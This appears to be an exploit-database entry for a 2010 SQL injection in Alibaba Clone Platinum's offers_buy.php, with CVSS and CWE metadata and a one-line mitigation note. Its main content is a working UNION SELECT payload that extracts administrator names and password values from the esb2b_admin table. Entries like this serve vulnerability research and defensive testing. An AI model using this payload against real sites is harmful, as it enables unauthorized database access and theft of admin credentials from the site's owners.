header-logo
Suggest Exploit
vendor:
Alibaba Clone Platinum
by:
v3n0m
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Alibaba Clone Platinum
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability

-9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin--

Mitigation:

Input validation and parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Navigation

Suggest Exploit

Services By CQR